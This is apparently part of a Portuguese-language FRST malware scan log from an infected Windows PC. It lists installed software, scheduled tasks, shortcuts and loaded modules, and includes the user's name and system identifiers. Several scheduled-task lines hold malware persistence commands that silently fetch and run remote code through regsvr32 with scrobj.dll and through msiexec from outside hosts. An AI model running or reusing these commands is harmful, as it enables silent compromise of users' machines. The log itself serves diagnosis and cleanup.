Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.33.3 - Google Inc.) Hidden
GoToAssist Corporate (HKLM-x32\...\GoToAssist) (Version: 11.3.0.1121 - Citrix Online, a division of Citrix Systems, Inc.)
Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1153 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
iTunes (HKLM\...\{164600BE-9CEC-44E6-9B38-2B12D5FE2342}) (Version: 12.6.0.100 - Apple Inc.)
Java 8 Update 131 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180131F0}) (Version: 8.0.1310.11 - Oracle Corporation)
Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Microsoft Office 365 Home Premium - pt-br (HKLM\...\O365HomePremRetail - pt-br) (Version: 15.0.4551.1512 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\OneDriveSetup.exe) (Version: 17.3.6743.1212 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50906.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 - ENU (HKLM-x32\...\{AA4A4B2C-0465-3CF8-BA76-27A027D8ACAB}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 Runtime (HKLM-x32\...\{299C0434-4F4E-341F-A916-4E07AEB35E79}) (Version: 9.0.30729 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 53.0 (x86 pt-BR) (HKLM-x32\...\Mozilla Firefox 53.0 (x86 pt-BR)) (Version: 53.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 53.0 - Mozilla)
Need for Speed™ Most Wanted PC Demo (HKLM-x32\...\{E085FD28-F22C-4D41-00A1-F0751BF8EFC1}) (Version: - )
Noise Reduction Plug-In 2.0 (HKLM-x32\...\{847C6940-D852-11E2-81D2-F04DA23A5C58}) (Version: 2.0.596 - Sony)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4551.1512 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4551.1512 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4551.1512 - Microsoft Corporation) Hidden
Pacote de Idiomas do Microsoft Visual Studio 2010 Tools for Office Runtime (x64) - Português (Brasil) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - PTB) (Version: 10.0.50903 - Microsoft Corporation)
Quickset64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 11.1.005 - Dell Inc.)
QuickTime 7 (HKLM-x32\...\{80CEEB1E-0A6C-45B9-A312-37A1D25FDEBC}) (Version: 7.78.80.95 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7544 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.2.8400.39034 - Realtek Semiconductor Corp.)
Sawbuck (HKLM-x32\...\{459BFE07-FCF3-4274-AC8B-8E8DDA7214BA}) (Version: 0.6.8.0 - Google Inc)
ScreenShot (HKLM-x32\...\ScreenShot) (Version: 2.0.4 - Filseclab Corporation)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype Web Plugin (HKLM-x32\...\{CD62BCB9-02D2-443F-AC7A-443377DA5B38}) (Version: 7.31.0.56 - Skype Technologies S.A.)
Skype™ 7.32 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.32.104 - Skype Technologies S.A.)
Software de dispositivo do Chipset Intel® (x32 Version: 10.1.1.9 - Intel(R) Corporation) Hidden
SpinTires Tech Demo (June 060613) (HKLM-x32\...\{9AF7D6F5-50A5-432C-9F7B-83BCE03B11A0}) (Version: 1.3 - Oovee)
Spotify (HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\Spotify) (Version: 1.0.49.125.g72ee7853 - Spotify AB)
Suporte para Aplicativos Apple (32-bit) (HKLM-x32\...\{05E07D23-91E9-4E70-A4CC-EF505088F967}) (Version: 5.4.1 - Apple Inc.)
Suporte para Aplicativos Apple Apple (64-bit) (HKLM\...\{741291DA-2B34-4D44-8FB6-58EDE21261D8}) (Version: 5.4.1 - Apple Inc.)
The Desktop Weather 2.0.1.11389 (HKLM\...\WeatherTool) (Version: 2.0.1.11389 - ShenZhen Enode Techology co,.Ltd) <==== ATENÇÃO
Unity Web Player (HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\UnityWebPlayer) (Version: 5.0.1f1 - Unity Technologies ApS)
VDownloader 4.5.2737 (HKLM\...\{A7E19604-93AF-4611-8C9F-CE509C2B286E}_is1) (Version: - Vitzo Limited)
vSnapshot 1.0.0.0 (HKLM\...\{F772C08D-9F61-45c6-982F-ADDEEE0D92C6}) (Version: 1.0.0.0 - ShenZhen Zhihuimen Techology co,.Ltd)
Warsaw 1.3.1 (HKLM-x32\...\{20E60725-16C8-4FB9-8BC2-AF92C5F8D06D}_is1) (Version: 1.3.1 - GAS Tecnologia)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 5.20 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.20.0 - win.rar GmbH)
YAC(Yet Another Cleaner!) (HKLM-x32\...\iSafe) (Version: - ELEX DO BRASIL PARTICIPAÇÕES LTDA) <==== ATENÇÃO
Yahoo Search Set (HKLM-x32\...\Yahoo! SearchSet) (Version: - Yahoo Inc.)
==================== Exame Personalizado CLSID (Whitelisted): ==========================
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== ATENÇÃO
CustomCLSID: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{0783EB25-59F8-4F02-B6B0-F1D4349F0013}\InprocServer32 -> C:\Users\ADEMIR MONTEIRO\AppData\Local\GAS Tecnologia\GBBD\npsf_uni_64.dll => Nenhum Arquivo
CustomCLSID: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{0783EB25-59F8-4F02-B6B1-F1D4349F0013}\InprocServer32 -> C:\Users\ADEMIR MONTEIRO\AppData\Local\GAS Tecnologia\GBBD\npsf_uni_64.dll => Nenhum Arquivo
CustomCLSID: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)
CustomCLSID: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{A62E09B4-6467-4E0F-9B52-E61D8BC9FC69}\localserver32 -> C:\Users\ADEMIR MONTEIRO\AppData\Local\SkypePlugin\7.31.0.56\GatewayVersion-x64.exe (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{CBF9CD8C-2714-4F36-B76A-43E6C7547BC2}\localserver32 -> C:\Users\ADEMIR MONTEIRO\AppData\Local\SkypePlugin\7.31.0.56\EdgeCalling.exe (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001_Classes\CLSID\{E5A7A7B5-9D06-4DBE-BAC0-04B69FF070B5}\InprocServer32 -> C:\Users\ADEMIR MONTEIRO\AppData\Local\SkypePlugin\7.31.0.56\GatewayActiveX-x64.dll (Skype Technologies S.A.)
==================== Tarefas Agendadas (Whitelisted) =============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
Task: {080BBA44-FD00-4236-B483-8B666C925A4A} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_ERROR_HB => C:\WINDOWS\system32\mrt.exe [2017-04-12] (Microsoft Corporation)
Task: {0F373340-7552-468F-805A-12372F3EBBA3} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {1070FB65-ACC2-4044-ADBB-9DE7AFFC3EA0} - System32\Tasks\{864BC306-9BC2-4E24-860C-052C2BDED33D} => launchwinapp.exe hxxp://ui.skype.com/ui/0/6.3.73.105.457/pt/go/help.faq.installer?LastError=1603
Task: {1C13CF54-132B-47A3-A9C3-46781DDE17AA} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Nenhum Arquivo <==== ATENÇÃO
Task: {1CEDBAD5-4285-4BCF-B9BB-1150C657C3AD} - \Microsoft\Windows\Setup\gwx\rundetector -> Nenhum Arquivo <==== ATENÇÃO
Task: {1FF36D07-1A84-4C32-9B78-1878EE9019A1} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1492537628-2073842835-3753687853-1001UA => C:\Users\ADEMIR MONTEIRO\AppData\Local\Facebook\Update\FacebookUpdate.exe [2014-11-09] (Facebook Inc.)
Task: {2088A7B8-A1C0-4438-B6B1-457A4C27A2DF} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== ATENÇÃO
Task: {21ECBBF7-3B97-4D47-8369-A2079A2A349E} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\integratedoffice.exe [2013-10-31] (Microsoft Corporation)
Task: {25AF1857-93F1-41E3-95BA-7EE079948513} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1YFjY5RTY1NjU8FjIdRkFdRUE8MdzXMTNQRWIxMUY8RH== scrobj.dll
Task: {32EB37C5-14B2-4DC8-9256-34ABAB7F2001} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1492537628-2073842835-3753687853-1001Core => C:\Users\ADEMIR MONTEIRO\AppData\Local\Facebook\Update\FacebookUpdate.exe [2014-11-09] (Facebook Inc.)
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => %SystemRoot%\System32\AutoWorkplace.exe
Task: {3ADB4358-FABB-4F5A-BAEA-A331F7F5B6C1} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {3BB11FEE-9805-4E4C-A070-61E59461E07C} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-04-15] (Adobe Systems Incorporated)
Task: {4325960B-88DF-4761-8F01-6B20997ABD54} - System32\Tasks\Tools_Update_{CFAC34AB-5DB5-4dea-94EC-1D42E3942873} => C:\Program Files (x86)\tools\update\tools_update.exe [2016-07-04] ()
Task: {4BC0638E-C6FE-48E2-9DC7-6B0DB4B4BA61} - System32\Tasks\R@1n-KMS\Office14ProPlus => wmic
Task: {4DCED5E7-C4D2-48E0-9465-4A9A58089B29} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Nenhum Arquivo <==== ATENÇÃO
Task: {5280B2E7-F127-40B0-AF3E-0A0674B4F874} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {595301D0-FBBC-4290-BD07-916D382DF13C} - System32\Tasks\{AD415D48-A269-4E70-981F-C480E2FD8AA6} => pcalua.exe -a "C:\Users\ADEMIR MONTEIRO\AppData\Roaming\do-search\UninstallManager.exe" -c -ptid=cor
Task: {599945A8-13E2-4CE3-9C9D-B497F82365B1} - System32\Tasks\PCDDataUploadTask => uaclauncher.exe
Task: {6003891B-4C6E-4CE1-A27D-41743253E457} - System32\Tasks\{788B64E0-E064-4709-9A1E-A97700A54644} => pcalua.exe -a "C:\Program Files\ByteFence\ByteFence.exe" -c /uninstall
Task: {634C2AFE-2840-4A2B-AF69-81BCE86DD08E} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\ADEMIR MONTEIRO\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
Task: {748A26FA-AC85-48B7-BDE5-889E02F6BB61} - System32\Tasks\Dell SupportAssistAgent AutoUpdate => C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssist.exe [2015-04-10] (Dell Inc.)
Task: {77706C8A-94AF-4E57-B8E2-03CF78500731} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Nenhum Arquivo <==== ATENÇÃO
Task: {7791C1D9-4C84-4119-B684-5B3BC288C976} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2017-02-14] (Apple Inc.)
Task: {7A40E99D-C5E2-44C6-BB7A-8430BBD22D6C} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {8186247E-67E3-4CF6-B37C-85542BFB8F52} - System32\Tasks\googleupdatetaskmachineua => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-27] (Google Inc.)
Task: {84A4D586-F069-481B-8AC3-656EF9F0018C} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-02] (Adobe Systems Incorporated)
Task: {8DC21957-9D43-435F-A928-0AC2F312D7CE} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {A0E0CF38-7693-4DCA-A502-A10561BF1C86} - System32\Tasks\googleupdatetaskmachinecore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-27] (Google Inc.)
Task: {A63F8300-1704-4F1A-ADF4-7B31FFCC23FA} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {B682F9E1-06F9-433A-803D-072B9B9DB540} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Nenhum Arquivo <==== ATENÇÃO
Task: {BDC4343F-A3A4-4507-8745-3FF497B5BDCA} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {BDDAE168-8F9C-4633-9A54-4728F4CFB574} - System32\Tasks\{8BA06421-6163-42DE-B7C9-7F08ADA59627} => launchwinapp.exe hxxp://ui.skype.com/ui/0/6.3.73.105.457/pt/abandoninstall?page=tsProgressBar
Task: {C1AC93B9-454A-437E-9027-1A2004FA261D} - \Microsoft\Windows\Setup\GWXTriggers\Time-Weekend -> Nenhum Arquivo <==== ATENÇÃO
Task: {C4FA5E11-2718-4ACA-ABD8-7FDF57BD96B3} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\Dell\SupportAssist\uaclauncher.exe [2017-04-18] (PC-Doctor, Inc.)
Task: {C6392B5A-3A2E-4477-B098-2CA65E62ACE6} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {CC21D6E8-24A8-4ABE-8FEB-697524D453D0} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Nenhum Arquivo <==== ATENÇÃO
Task: {CD7FFAF9-0423-42E9-A52D-5840EDA92753} - \BackgroundContainer Startup Task -> Nenhum Arquivo <==== ATENÇÃO
Task: {D20A4A65-00F9-43FD-9664-28FF8CFE3DFE} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\Dell\SupportAssist\sessionchecker.exe [2017-04-18] (PC-Doctor, Inc.)
Task: {E040132B-4205-44A1-86B0-3EDAC6A6F355} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonx86\Microsoft Shared\OFFICE15\OLicenseHeartbeat.exe [2014-01-15] (Microsoft Corporation)
Task: {E0A2BEA2-67D5-468B-87FB-8A28DC93D858} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
Task: {E9994BDE-E1BC-45EA-AB98-4106B75B5C7B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {F19A9187-9B6C-4D2C-B1D1-8E6BAA2167C4} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1YFjY5RTY1NjU8FjIdRkFdRUE8MdzXMTNQRWIxMUY8RH== scrobj.dll
Task: {F961350E-3BDD-4EB4-9FDA-1DE60446BA52} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Nenhum Arquivo <==== ATENÇÃO
Task: {FCA2EF96-3A7F-49C4-8FAC-792DC8218A12} - \WPD\SqmUpload_S-1-5-21-1492537628-2073842835-3753687853-1001 -> Nenhum Arquivo <==== ATENÇÃO
(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)
Task: C:\WINDOWS\Tasks\Dell SupportAssistAgent AutoUpdate.job => C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssist.exe
Task: C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-1492537628-2073842835-3753687853-1001Core.job => C:\Users\ADEMIR MONTEIRO\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-1492537628-2073842835-3753687853-1001UA.job => C:\Users\ADEMIR MONTEIRO\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
Task: C:\WINDOWS\Tasks\Tools_Update_{CFAC34AB-5DB5-4dea-94EC-1D42E3942873}.job => C:\Program Files (x86)\tools\update\tools_update.exe
==================== Atalhos =============================
(As entradas podem ser listadas para serem restauradas ou removidas.)
Shortcut: C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
ShortcutWithArgument: C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001
ShortcutWithArgument: C:\Users\ADEMIR MONTEIRO\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492601824&z=b0f768d892a851af7ca5519gdz7t0o4q8e1g1b0ocw&from=che0812&uid=ST750LM022XHN-M750MBB_S317J90D848001848001
==================== Módulos Carregados (Whitelisted) ==============
2017-01-13 13:56 - 2017-01-13 13:56 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2017-03-16 16:08 - 2017-03-16 16:08 - 01354040 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2016-12-24 00:30 - 2016-12-24 00:30 - 00152264 _____ () C:\Program Files (x86)\vSnapshot\1.0.0.0\vSnapshotServ.exe
2016-07-10 01:16 - 2016-07-10 01:16 - 00026112 _____ () C:\Windows\KMS-R@1n.exe
2013-12-03 15:35 - 2013-08-23 14:45 - 00379560 _____ () C:\Program Files\Microsoft Office 15\ClientX64\c2rui.dll
2013-12-03 15:35 - 2013-10-31 09:08 - 00520872 _____ () C:\Program Files\Microsoft Office 15\ClientX64\c2r64.dll
2013-12-03 15:35 - 2013-10-31 09:07 - 00618152 _____ () C:\Program Files\Microsoft Office 15\ClientX64\StreamServer.dll
2016-05-30 03:24 - 2016-05-30 03:24 - 00150640 _____ () C:\Program Files (x86)\WeatherTool\2.0.1.11389\WeatherService.exe
2016-07-10 01:16 - 2016-07-10 01:16 - 00005120 _____ () C:\WINDOWS\KMS-R@1nHook.exe
2016-07-10 01:16 - 2016-07-10 01:16 - 00004096 _____ () C:\WINDOWS\KMS-R@1nHook.dll
2017-04-17 19:19 - 2017-04-13 00:08 - 00116400 _____ () C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
2016-07-16 08:42 - 2016-07-16 08:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2017-04-12 00:42 - 2017-03-28 03:22 - 02681200 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2017-04-12 00:42 - 2017-03-28 03:22 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-05-30 03:30 - 2016-05-30 03:30 - 01049712 _____ () C:\Program Files (x86)\WeatherTool\2.0.1.11389\WeatherEntryDll.dll
2017-04-12 00:42 - 2017-03-28 03:22 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2013-09-05 00:17 - 2013-09-05 00:17 - 04300456 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2016-10-28 14:54 - 2016-09-07 01:56 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-03-17 10:30 - 2017-03-04 03:31 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-03-17 10:31 - 2017-03-04 03:12 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-03-17 10:31 - 2017-03-04 03:05 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-03-17 10:31 - 2017-03-04 03:05 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-04-12 00:42 - 2017-03-28 02:07 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2017-04-12 00:42 - 2017-03-28 02:08 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-04-12 00:43 - 2017-03-28 02:11 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2017-04-10 10:39 - 2017-04-10 10:39 - 00077312 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-04-10 10:39 - 2017-04-10 10:39 - 00189952 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-04-10 10:39 - 2017-04-10 10:39 - 42507264 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-04-10 10:39 - 2017-04-10 10:39 - 02334184 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\skypert.dll
2014-01-26 19:09 - 2014-07-11 11:02 - 00127688 _____ () C:\Program Files (x86)\PSafe\CrashLib.dll
2016-12-24 00:30 - 2016-12-24 00:30 - 00574152 _____ () C:\Program Files (x86)\vSnapshot\1.0.0.0\Updata.dll
2016-05-30 03:21 - 2016-05-30 03:21 - 00543344 _____ () C:\Program Files (x86)\WeatherTool\2.0.1.11389\EVPTask.dll
2016-05-30 03:20 - 2016-05-30 03:20 - 00406640 _____ () C:\Program Files (x86)\WeatherTool\2.0.1.11389\EVPNet.dll
2016-05-30 03:19 - 2016-05-30 03:19 - 00428656 _____ () C:\Program Files (x86)\WeatherTool\2.0.1.11389\EVPDR.dll
2017-04-17 19:11 - 2017-04-17 00:03 - 00106496 _____ () c:\programdata\software\apple\apps\notification.dll
2015-03-16 11:28 - 2015-03-16 11:28 - 00155528 _____ () C:\Program Files (x86)\Dell Digital Delivery\ServiceTagPlusPlus.dll
2015-06-24 01:07 - 2015-06-24 01:07 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
2017-04-25 09:28 - 2016-05-22 23:37 - 00065696 _____ () C:\Program Files (x86)\Elex-tech\YAC\zlib1.dll
2017-04-25 09:28 - 2016-05-22 23:37 - 00179200 _____ () C:\Program Files (x86)\Elex-tech\YAC\libpng.dll
2015-02-26 14:07 - 2015-02-09 13:14 - 01905904 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\STRestoreAPI.dll
2013-10-08 04:15 - 2012-11-25 23:19 - 01153384 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\libxml2.dll
2015-02-26 14:07 - 2014-02-18 16:12 - 00117568 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\zlib1.dll
==================== Alternate Data Streams (Whitelisted) =========
(Se uma entrada for incluída na fixlist, somente o ADS será removido.)
==================== Modo de Segurança (Whitelisted) ===================
(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)
==================== Associação (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)
==================== Internet Explorer confiável/restrito ===============
(Se uma entrada for incluída na fixlist, será removida do Registro.)
IE trusted site: HKU\S-1-5-21-1492537628-2073842835-3753687853-1001\...\itau.com.br -> bankline.itau.com.br
==================== Hosts Conteúdo: ===============================
(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)
2013-08-22 10:25 - 2017-04-13 11:38 - 00000822 ____A C:\WINDOWS\system32\Drivers\etc\hosts
==================== Outras Áreas ============================
(Atualmente não há nenhuma correção automática para esta seção.)
